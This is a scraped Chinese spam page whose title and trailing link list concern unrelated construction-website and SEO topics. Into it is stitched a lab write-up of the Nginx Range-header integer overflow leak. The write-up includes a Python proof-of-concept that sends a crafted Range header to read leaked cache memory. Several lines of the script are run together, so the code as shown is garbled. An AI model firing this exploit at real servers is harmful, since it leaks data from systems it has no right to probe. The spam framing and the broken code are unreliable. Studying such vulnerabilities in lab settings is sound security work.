当前位置: 首页 > news >正文

湖北省建设工程造价管理协会网站销售怎么做

湖北省建设工程造价管理协会网站,销售怎么做,如何创办.com网站,网站引导视频怎么做漏洞原理: 影响版本内默认配置模块的Nginx只需要开启缓存,攻击者可以通过发送包含恶意构造range域的header请求进行远程攻击造成信息泄露。 影响范围: Nginx 0.5.6 – 1.13.2 漏洞复现: 开启靶场,访问8080端口 中间…

漏洞原理:

影响版本内默认配置模块的Nginx只需要开启缓存,攻击者可以通过发送包含恶意构造range域的header请求进行远程攻击造成信息泄露。

影响范围:

         Nginx 0.5.6 – 1.13.2

漏洞复现:

开启靶场,访问8080端口

中间件版本在影响范围内

使用poc验证漏洞:

#!/usr/bin/env python
import sys
import requestsif len(sys.argv) < 2:print("%s url" % (sys.argv[0]))print("eg: python %s http://your-ip:8080/" % (sys.argv[0]))sys.exit()headers = {'User-Agent': "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.10240"
}
offset = 605
url = sys.argv[1]
file_len = len(requests.get(url, headers=headers).content)
n = file_len + offset
headers['Range'] = "bytes=-%d,-%d" % (n, 0x8000000000000000 - n)r = requests.get(url, headers=headers)
print(r.text)

 

​​​​​​​

http://www.qdjiajiao.com/news/3382.html

相关文章:

  • 长春网站建设网诚传媒最新军事新闻 今日 最新消息
  • 深圳深圳龙岗网站建设公司优化水平
  • 忻州做网站重庆疫情最新数据
  • 做网站后端需要学什么今日国际新闻最新消息大事
  • 家里笔记本做网站 怎么解析网络推广关键词优化公司
  • 网站设计服务平台长沙seo搜索
  • 电子商务网站建设需要cps推广平台有哪些
  • 泉州市网站建设阿里数据
  • 惠州市两学一做网站网络营销公司哪家可靠
  • 网站项目计划说明书怎样交换友情链接
  • ftp网站模板怎么注册一个自己的网址
  • 开发一个大型网站多少钱semester是什么意思
  • 网站流量团队俄罗斯搜索引擎
  • 做网站新乡谷歌app下载
  • 公司宣传网站怎么做上海高玩seo
  • 石家庄裕华区网站建设广州seo网站推广
  • 四川网站建设公司电话怎样在百度打广告
  • wordpress编辑网页专业seo推广
  • WordPress文章预览篇幅seo营销专员
  • 简单网站设计模板郑州seo招聘
  • wordpress url 英文做seo需要投入的成本
  • 哈尔滨做平台网站平台公司子域名网址查询
  • 做外贸网站需要注意些什么手续营销的三个基本概念是什么
  • 常州seo免费手机优化大师下载安装
  • 免费ppt下载软件百度seo价格查询
  • 网站建设规划图seo最新技巧
  • 深圳哪里有做网站推广的北京十大最靠谱it培训机构
  • 网站ftp查询网推一手单渠道
  • 自己做网站怎么做河南省疫情最新情况
  • wordpress基本功能seo快速排名优化方式